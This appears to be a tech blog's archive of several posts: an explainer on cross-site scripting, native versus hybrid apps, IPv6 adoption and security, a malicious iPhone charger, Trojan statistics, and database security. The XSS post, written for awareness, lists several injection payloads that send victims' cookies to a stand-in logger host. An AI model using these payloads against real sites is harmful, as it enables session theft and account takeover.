THE DANGERS OF CROSS-SITE SCRIPTING (XSS)

THIS IS REALLY SERIOUS !!!

Cross-Site Scripting is the most common security vulnerability in today's websites.

Most web security professionals will write off XSS, as it does not involve remote code execution. They believe that it is not a threat, nothing could be further from the truth.

First of all: "What Is XSS?"

XSS Stands for Cross-Site Scripting.
Essentially, XSS is an exploit where client side script (usually JavaScript) is injected into a trusted page. I will get in to how this is done a little later.

Client side scripting (JavaScript) was intended to make dynamic web pages, to make web pages interactive. JavaScript is used on the vast majority of websites today for just that purpose, as well as more important features such as cookie handling, communicating with the server (AJAX and JSON), logging traffic (such as Google Analytics), and many other critical uses.

The problem arises when this highly useful and nearly universally supported language is used maliciously. Again, I will get in to what can be done a little later.

But, in summary, XSS injects a malicious piece of client side scripting (usually JavaScript, but VBscript and others are sometimes used). This code that has been injected is then used to cause some sort of vulnerability on a victim.

"How is this code injected?"

There are two essential types of XSS:
Non-Persistent
Persistent

1) Non-Persistent (Type-1):

This is when, due to improper data handling, scripting can be injected to a non permanent part of a website, for example a search feature or error page.

Scenario:

An attacker locates a way to inject script into a search feature, so that when the page states "No Posts Found For Keywords ____," an attacker can inject script where it returns the keywords.

So, via a specially crafted link, the attacker can link to the exploit. The attacker then injects a cookie stealer, and sends the link to a website administrator, who clicks the link and has her administrative cookie stolen. The attacker can now pose as the administrator and make changes to the website, and in some cases change the password so that the real administrator can not get back in.

Also, the attacker may be able to decode the cookie to get the actual plaintext password in some cases. The attacker then leverages her server side script access to get root access on the server.

2) Persistent (Type-2):

This is when, due to a poor filter, scripting can be injected in to a permanent part of a site by a user, for example a comment, a blog, or a profile.

Scenario:

An attacker, via a known injection, is able to replace his profile on MySpace with a fake login screen. The victim, not knowing that it is a fake (as it looks exactly real) logs in, and has her password and email stolen. Many people use the same user name and password for everything, so the attacker now has access to not only her MySpace account, but to her email, bank, etc. The attacker can now essentially ruin her life, from a simple injection.

"What Can Happen If I Don't Fix It?"

There are any number of terrible things that can happen if an attacker exploits an XSS vulnerability.
But, there are a few things that WILL happen:
Costs of fixing the problem WILL increase dramatically, due to the rushed nature of the work, extra damages, etc. Costs can go up many thousands of times, depending on the severity of the exploit.
Users WILL lose confidence in your website, and you WILL lose users.
There WILL be downtime.

But, as far as the specific things an attacker can do, here is a short list:
An attacker can use a cookie stealer to steal user accounts. This can even give an attacker administrative privileges on your website, even giving an attacker root privileges, then: game over. Its done. They can do literally ANYTHING to your site or the server at that point.
A fake login page can be created to trick users in to revealing private information.
Fake pages can be posted (DOM Based Attack) that could be anything from a fake blog post, to a redirect to a shock site, to a more malicious page meant to slander the website. Remember, everyone will think that the page was posted by an official at your site.
Browser exploits can be used to gain control of victims computers, install malware (viruses, spyware, etc.), or trick a user in to installing dangerous software (grayware).
A fake page can also be used to social engineer (trick) a victim in to revealing credit card, banking, SSN, or other sensitive personal information.
A clickjacking attack can be launched, to do any number of malicious things.

Remember, this is a VERY concise list, the actual list of possible attacks is endless.

"How is JavaScript used to do all of this?"

There is no one answer to this question, the number of attacks is so huge that it would be impossible to list them here. But as for some of the popular ones, here they are:

A simple search engine injection:

yoursite.com/search.pl?q=%3Cscript%3Edocument.location%3D%22http%3A//example.com/logger.php%3Fcookie%3D%22+document.cookie%3B%3C/script%3E

All of that code at the end translates to:

<script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>

Simply, this code redirects to a malicious site, carrying the victims cookie data in a GET variable (?cookie=). The evil site logs it, and they then have you personal information.

A few variants on that would be:

Closing <title> tag, then inject script:

</title><script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>

Closing text input, link title, etc, then injecting script:

"><script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>

Iframe attack:

<iframe src="javascript:parent.document.location='http://example.com/logger.php?cookie='+parent.document.cookie;"></iframe>

Link Attack (executes when the link is clicked)

<a href="javascript:document.location='http://example.com/logger.php?cookie='+document.cookie;">CLICK ME!</a>

Attribute Injection (executes when the mouse is moved anywhere on the page):

hi" style="position:absolute;top:0px;left:0px;height:100%;width:100%;display:block;z-index:400" onmousemove="document.location='http://example.com/logger.php?cookie='+document.cookie;

This results in code like:

<input type="text" value="hi" style="position:absolute;top:0px;left:0px;height:100%;width:100%;display:block;z-index:400" onmouseover="document.location='http://example.com/logger.php?cookie='+document.cookie;">

Inter-Block Injection:

hi";document.location='http://example.com/logger.php?cookie='+document.cookie;//

Resulting in JavaScript like:

var searchQuery = hi";document.location='http://example.com/logger.php?cookie='+document.cookie;//";

That is just a tiny taste of the possible injections, to a skilled attacker, those are child's play, and far more sophisticated attacks can and will be created.



"Of course, MY small site will not be affected, no hacker has any interest in MY small site!"

This is a common misconception, as attackers will often scan for common injections, and no site is spared. Even if the site is getting no more than 2 visitors a month or less, an attacker will log the vulnerability, and exploit it later, or sell it to a scammer.
In short, NO ONE is safe because of size.


"My site is so simple, there couldn't possibly be a security flaw in it."

Another common misconception, while the simpler the site, the less likley an XSS injection will be there, this does not mean your site is in any way safe.



"I used a popular paid/open source script so there can't be an XSS hole, if I paid for it, it simply can not have bad security." OR "I hired a PROFESSIONAL web developer, who is an expert in web security, if there was a problem, he would have known. This can not be a real threat if he didn't bother fixing it"

Quite possibly the most dangerous misconception of all. Web developers, weather MIT educated, or a 15 year old neighbor, often do not understand the severity of XSS, or know how to fix it. In fact, MIT educated web developers often forget to use proper filtering, they are only human. Even if they do know about the risk, they may simply forget to filter.

On the topic of paid scripts and open source scripts, they are often the most vulnerable, in fact, I located critical security flaws in multiple paid and open source shopping carts, not only XSS but other critical vulnerabilities, such as SQL injection and read exploits.




In short, no matter who made your website, or what your webmaster tells you, if there is an XSS exploit in your site, you are never safe. Period.

Native Apps VS Hybrid Apps !!!

What is a Native Application ?

Definition. Apps developed exclusively for a specific mobile platform that can leverage all device capabilities.

The inherent benefits are obvious. Native applications can leverage the full array of features and functions available through the mobile device’s core operating system. Generally, they are faster, smoother and offer a significantly more fluid user experience than either Hybrid apps or mobile Web apps.

Native Mobile Apps- Built using the native programming language for the platform like iPhone or iPad apps built using Objective-C, and Android application built with Java. Native apps are fast, provide better user experience and interface and have access to all device features for which it is built. On the down side, a native app can be used only for its specific platform thereby restricting the reach. For e.g., an android app cannot be run on an iPhone and vice versa. If you want to cover a larger audience across all platforms, you will need to have separate native apps for them.

Instagram-Example of Native Applications

Angry Birds-Example of Native Applications

What is a Hybrid Application ?

Definition. Apps that wrap a mobile web interface inside a native container

Today, technology changes so rapidly that most businesses require immense flexibility and scalability to adapt content, design and even application architecture, all on the fly. By deploying applications that rely on a robust combination of HTML5 Web technologies and native OS features, you preserve a large degree of control over the content and design of the solutions we build for mobile platforms.
We find that this process empowers our customers to perform fast, easy, on-demand updates, without losing the inherent advantages that come from hosting a solution in the iTunes Apps Store or the Android Marketplace.

While many confuse a hybrid app with a native app, but there is a fundamental distinction. A hybrid application is built using web technology, and then wrapped in a platform specific shell.  The native shell not only makes it look like native apps and makes it eligible to enter the app stores, but also, developers can build in some of the native functionalities into it, to access some of the native APIs and use device specific hardware features to some extent. A hybrid app is basically an app developed in combination with HTML 5 and native technology. For cross platform reach, developers would need to code the native part separately for each platform but they can use the same HTML5 part across all of them.

More in this video:

-And now that we know what a Hybrid & Native Application means, Here's a comparison between them:

Comparing Native to Hybrid

The following table offers a matrix comparing the benefits and various features supported by native and hybrid mobile applications.

Feature	Native	Hybrid (PhoneGap)
Access to the Contacts or Address Book	Full support	All platforms except older Blackberry OS and WebOS
Access to the Accelerometer (motion detection)	Full support	Not supported on older Blackberry OS
Camera	Full support	Not supported on older Blackberry OS
Storing data locally and offline	Full support	All platforms except older Blackberry OS and Samsung Bada
Accessing network properties and conditions	Full support	Full support
Access to the local file system for saving and retrieving files (e.g. images)	Full support	All except Symbian, older Blackberry OS, WebOS and Bada
Access to Location / GPS data	Full support	Full support
Local notifications (alerts, vibration, sound)	Full support	Full support

And here's a Video to increase your knowledge about those Apps

References and External Links:

Web Sites:

www.worklight.com

http://mobiloud.com/blog/2012/06/native-web-or-hybrid-apps/

http://www.cloudsherpas.com/services/custom-development/mobile-apps/native-hybrid-and-mobile-web-application-development/

http://www.mendix.com/blog/whats-the-big-deal-with-native-vs-web-vs-hybrid-applications/

http://sandhill.com/article/hybrid-or-native-mobile-app-development-six-key-considerations/

http://www.quora.com/Mobile-Applications/What-is-the-difference-between-HTML5-Native-and-a-Hybrid-app-Which-is-better

http://www.xcubelabs.com/blog/native-web-and-hybrid-apps-understanding-the-difference/

http://www.icenium.com/resources/forums/icenium-general-discussion/native-vs-hybrid-app

http://scn.sap.3com/thread/3365532

Video Links:

 

https://www.youtube.com/watch?v=Ns-JS4amlTc

https://www.youtube.com/watch?v=HDnNEKtBkBE

One Year After World IPv6 Launch, Number Of IPv6-Connected Internet Users Doubles

WASHINGTON, D.C., USA and GENEVA, SWITZERLAND – 3 June 2013 – The number of IPv6-connected users has doubled since World IPv6 Launch began on June 6, 2012, when thousands of Internet service providers (ISPs), home networking equipment manufacturers, and Web companies around the world came together to permanently enable the next generation of Internet Protocol (IPv6) for their products and services. This marks the third straight year IPv6 use on the global Internet has doubled. If current trends continue, more than half of Internet users around the world will be IPv6-connected in less than 6 years.

“The year since World IPv6 Launch began has cemented what we know will be an increasing reality on the Internet: IPv6 is ready for business,” said Leslie Daigle, the Internet Society’s Chief Internet Technology Officer. “Forward-looking network operators are successfully using IPv6 to reduce their dependency on expensive, complex network address translation systems (CGNs) to deal with a shortage of IPv4 addresses. Leaders of organizations that aspire to reach all Internet users must accelerate their IPv6 deployment plans now, or lose an important competitive edge.”

As IPv6 adoption continues to grow, members of the worldwide Internet community are contributing to its deployment. Statistics reported by World IPv6 Launch participants underscore the increasing deployment of IPv6 worldwide:

• Google reports the number of visitors to its sites using IPv6 has more than doubled in the past year. • The number of networks that have deployed IPv6 continues to grow, with more than 100 worldwide reporting significant IPv6 traffic. • Australian ISP Internode reports that 10 percent of its customers now use IPv6 to access the Internet. • Akamai reports that it is currently delivering approximately 10 billion requests per day over IPv6, which represents a 250 percent growth rate since June of last year. • KDDI measurement shows that the number of IPv6 users of KDDI has doubled and that IPv6 traffic has increased approximately three times from last year.

World IPv6 Launch participants have worked together to help drive adoption, leading to the creation of World IPv6 Day in 2011, in which hundreds of websites joined together for a successful global 24-hour test flight of IPv6. This was followed by World IPv6 Launch in 2012, in which more than a thousand participants permanently enabled IPv6 for their products and services, including four of the most visited websites: Google, Facebook, YouTube, and Yahoo!.

As a platform for innovation and economic development, the Internet plays a critical role in the daily lives of billions. This momentum has not slowed — IPv6 adoption continues to skyrocket, fast establishing itself as the “new normal” and a must-have for any business with an eye towards the future.

For more information about companies that have deployed IPv6, as well as links to useful information for users and how other companies can participate in the continued deployment of IPv6, please visit: http://www.worldipv6launch.org

About the need for IPv6 IPv4 has approximately four billion IP addresses (the sequence of numbers assigned to each Internet-connected device). The explosion in the number of people, devices, and web services on the Internet means that IPv4 is running out of space. IPv6, the next-generation Internet protocol which provides more than 340 trillion, trillion, trillion addresses, will connect the billions of people not connected today and will help ensure the Internet can continue its current growth rate indefinitely.

Hacking Your IPhone From Your Charger !!!

Researchers Say They Can Hack Your iPhone With A Malicious Charger

Careful what you put between your iPhone and a power outlet: That helpful stranger’s charger may be injecting your device with more than mere electrons.

At the upcoming Black Hat security conference in late July, three researchers at the Georgia Institute of Technology plan to show off a proof-of-concept charger that they say can be used to invisibly install malware on a device running the latest version of Apple’s iOS.

Though the researchers aren’t yet sharing the details of their work, a description of their talk posted to the conference website describes the results of the experiment as “alarming. Despite the plethora of defense mechanisms in iOS, we successfully injected arbitrary software into current-generation Apple devices running the latest operating system (OS) software,” their talk summary reads. “All users are affected, as our approach requires neither a jailbroken device nor user interaction.”

The researchers’ malicious charger, which they’re calling “Mactans” in what seems to be a reference to the scientific name of the Black Widow spider, is built around an open-source single-board computer known as a BeagleBoard, sold by Texas Instruments for a retail price of around $45. “This hardware was selected to demonstrate the ease with which innocent-looking, malicious USB chargers can be constructed,” the researchers write.

It’s not clear just how convincing that charger will be, of course, given that a three-inch square BeagleBoard can’t fit into the smaller power adaptors Apple sells for charging its gadgets, like the one shown above. But a BeagleBoard could be hidden in a docking station or external battery, and the team hints that others with more resources may be able to advance their work: “While Mactans was built with [a] limited amount of time and a small budget, we also briefly consider what more motivated, well-funded adversaries could accomplish.”

When I spoke by phone Friday with Yeongjin Jang, one of the Georgia Tech researchers, he told me that the team had contacted Apple about their exploit, but hadn’t yet heard back from the company, and declined to comment further. I reached out to Apple, too, and will update this post if the company responds.

The researchers write that their attack can compromise an iOS device running the most recent version of Apple’s mobile operating system in less than a minute. They add that they can also demonstrate that the malware infection resulting from their malicious charger is persistent and tough to spot. “We show how an attacker can hide their software in the same way Apple hides its own built-in applications,” reads their description.

The Georgia Tech researchers would be far from the first to hack iOS devices via their USB connections. The devices’ combined data and power port has been the most common point of entry for hackers seeking to jailbreak their devices to remove Apple’s default restrictions on their devices. The “evasi0n” jailbreak released by a group of iOS hackers in February, for instance, took advantage of a flaw in iOS’s mobile backup system as well as four other bugs to dismantle the devices’ security measures.

That jailbreak was used more than 18 million times by iOS users eager to hack their iPhone, iPads and iPod touches before Apple updated their software to block the exploit in March. Given that Georgia Tech is demonstrating a far less friendly technique, expect Apple to move fast to patch the bugs they’re exposing.

Trojan Causes 80 percent of computers infected worldwide

Trojan Causes 80 percent of computers infected worldwide !!!

Panda security recently announced the release of its quarterly report for Q1 2013, which states that more than six million new malware, has been launched between January and March of this year, and Trojan represents three out of the four new released malware samples in circulation during the same period.
The report also said that Trojan has contributed about 79.99 percent infections of all computers worldwide. Trojans are cyber crooks weapon of choice, which explains why they account for most new specimens in circulation and infections triggered in the first quarter of the year,” Panda Labs technical director Luis Corrons said in a statement.

According to the report the total computer infected worldwide is more than 30.31 percent, it been noted that china has the largest number of computer infected having 50 percent of computers infected, followed by Ecuador at 41.01 percent, Turkey at 40.38 percent, Argentina at 37.77 percent, Peru at 37.43 percent, and Taiwan at 36.48 percent.Conversely, Finland has the fewest infections, at 17 percent, followed by Sweden at 20 percent, Switzerland at 20.99 percent, the United Kingdom at 21.89 percent, Norway at 22.57 percent, and Japan at 22.82 percent.
Warning: Use a standard anti-virus software to shield your computer.

Why we need IPv6 now and what it means for network security

Thomas Edison, in 1882, opened a power station on Pearl Street in New York city to supply the densely populated Manhattan island with DC power [1]. DC was the logical power distribution standard at the time. Easily generated and safely distributed across the limited geographic area it was intended to supply. Soon followed a fierce debate about power standards. From it emerged what we now know as the electricity grid. AC, alternating current, won out for a pretty simple reason: It scaled. It could be expanded into a large interconnected network. Omnipresent reliable electric power continued to drive our economy and innovation.

Todays’ Internet is undergoing a similar debate. Originally, the Internet standard communications protocol (“IPv4″, or “Internet Protocol Version 4″) was conceived in the 70s and 80s. It’s intent was to interconnect research universities and government facilities. It was never intended to be today’s global business network. Memory of computers connected to the early Internet was measured in kilo bytes [2]. Connectivity between facilities was frequently provided by dialup modems. We have outgrown every single one of these specifications by orders of magnitude. The most apparent limitation of IPv4 is its lack of address space. Designed for a limited number of research campuses, IPv4 provides up to 4 billion addresses. IPv4 was never designed to have all 4 Billion addresses used. Certainly not to supply the current world population of 7 Billion [3]. Today, the number of devices connected to the Internet exceeds the number of people alive [4]. The current use (and over use) of addresses causes delays and difficulties in routing Internet traffic and limits the growth of the Internet in particular in emerging markets. Mobile technologies are held back because network providers can not assign routable addresses to every mobile device.

Time to rethink. IPv6 (Internet Protocol Version 6) is about to ring in a new age for the Internet. It not only substantially increases the amount of addresses, but also enables more efficient routing, the efficient use of modern hardware and the ability to support modern networking concepts like mobility. If it is so great, why is everybody so slow in adopting it? If it is not broken, don’t fix it! The current IPv4 Internet is working just well enough. Network operators around the globe don’t see the need to upgrade equipment, and learn about new technology, unless customers demand it.

Just like when Tesla advocated AC power back around the turn of the century, and Edison stole cats and dogs across Manhattan to electrocute them in a public demonstration of the danger of AC power, much of today’s fear of IPv6 is based on the assumption that IPv6 is insecure[5]. We barely learned how to somewhat secure our IPv4 network. Understandably network administrators are hesitant to throw out the operational experience gained in running IPv4 networks. But in addition to new complexities and changes offered by IPv6, there are a number of important security improvements. IPv4 was not designed to be secure. The standard defining IPv4 originally, known as “RFC 791″, specifically states that there is “no mechanisms to augment end-to-end data reliability,…” [6]. Features like virtual private networks with encryption, reliable routing and authentication where bolted on later and never properly integrated. IPv6 does however integrate these later additions properly, and even provides for future expansion in an organized way.

There are a number of important security features that are either already implemented in IPv6, or that are on the drawing board for the near future:
IPSec (encrypted VPNs) are now a mandatory component. IPSec still needs to be configured properly, but at least it is now universally available.
A plethora of addresses will allow for logic and functional address assignment. We no longer need to design subnet sizes around “what’s available” but we can now design networks that make sense.
Addresses with different scopes allow for the proper isolation of hosts.
Simplified rules for fragmentation make it easier to defend diverse networks with different network technologies.
If desired, end to end connectivity with reliance on “NAT” (Network Address Translation) will allow for a simpler configuration of end-to-end encrypted networks
Address will no longer be shared among different devices, allowing for an easier attribution of network traffic and simpler asset control.
Using a so far not widely implemented extension, it will be possible to create addresses cryptographically and validate them on the local network.[7]

These are just some of the more prominent security features built into IPv6. Needless to say, network administrators need to gain experience with these features and lear to use them. Luckily, IPv4 and IPv6 can operate next to each other, and we don’t need to switch over in one day. June 6th has been designated “IPv6 day” by the Internet Society [8]. Many large web sites will be reachable via IPv6 starting June 6th. How long will it take to “cut over” and when will we be able to “turn off” IPv4? Con Edison, the New York power company that emerged out of Edison’s first attempts in Manhattan, disconnected it’s last DC cutovers in 2007, 125 years after the network was originally implemented. Thats’ about 12 years in “Internet Time”.

[1] http://cityroom.blogs.nytimes.com/2007/11/14/off-goes-the-power-current-started-by-thomas-edison/
[2] http://www-03.ibm.com/ibm/history/exhibits/mainframe/mainframe_intro2.html
[3] http://www.census.gov/main/www/popclock.html
[4] http://blogs.cisco.com/news/the-internet-of-things-infographic/
[5] http://theoatmeal.com/comics/tesla
[6] http://www.ietf.org/rfc/rfc791.txt
[7] http://ipv6.com/articles/research/Secure-Neighbor-Discovery.htm
[8] http://www.worldipv6day.org/



To learn more about IPv6, also see https://isc.sans.edu/ipv6videos

What Every Database Administrator Should Know About Security

To say that there is friction between security professionals and database administrators (DBAs) is putting it mildly.

Database administrators are both the caretakers of database platforms and the managers of data. Very seldom are they also security experts. In many enterprises, the DBA and the security team find themselves at odds because the DBA is judged on availability and ease of use, not security. Yet the security team advocates controls that restrict access, add complexity and slow database performance. That's not a recipe for keeping end users happy, and DBAs tend to bear the brunt of criticism.

Databases hold a majority of the sensitive data within most enterprises, and have been a prime target for attackers for more than a decade. The considerable skills database administrators bring to the table are often marginalized, with security teams failing to leverage these valuable skills because they feel DBAs lack the "security mindset" needed to comprehend wickedly resourceful attackers who target enterprise data. Security does not trust DBAs becausethey feel they lack an understanding of the problems at hand.

Bridging the gap between DBAs and security professionals--bringing their respective strengths into play--can only make a company more resilient. The goal is to educate DBAs on the problems security teams are trying to address, and to arm them with enough information so that they can both appreciate the motivation of security requirements and help propose implementations that secure data while not smashing performance and productivity. In this way, DBAs and security pros can work together to create database environments that are not only functional, but highly secure.

The first step in this process is to talk about what most DBAs don't know. To better close the gap between security and database management, let's address the issues of why security is important and some of the key reasons security teams don't work closely with DBAs.

DBAs are not vulnerability researchers.

As a database administrator, it's likely you don't understand half of the vulnerabilities databases are vulnerable to. That's not meant as an insult--even within the security community, vulnerability research is a specialized sub-discipline practiced by only a handful of people. With that said, it's important that youfollow these issues if you want to understand why security teams ask you implement specific security controls. Much in the same way you need to understand how bugs affect the database, or how some settings affect stability and performance, you need to have a basic understanding of vulnerabilities.

Essentially, there are three critical things you need to know about any vulnerability: which feature is/was at risk; the basic methods attackers use to exploit the vulnerability; and whether the vulnerability requires credentials to exploit. You can learn more from CERT/Mitre announcements, vendor security announcements and vendor best practices, as well as from following security and/or database blogs.

Hackers know databases as well as you do.

Hackers spend hundreds of hours examining specific features. They work tirelessly to understand how these features work and, more importantly, how a feature can be made to misbehave. They understand the internal workings of the database, and usually how a feature's documented specification differs from the implementation.

There's no such thing as a "minor database vulnerability no one else knows about." Attackers are aware of potential flaws, and they will know how to probe your database to see if it's vulnerable to those flaws.

To read more key points that database administrators should know about security -- and how security people can communicate them -- download the free report.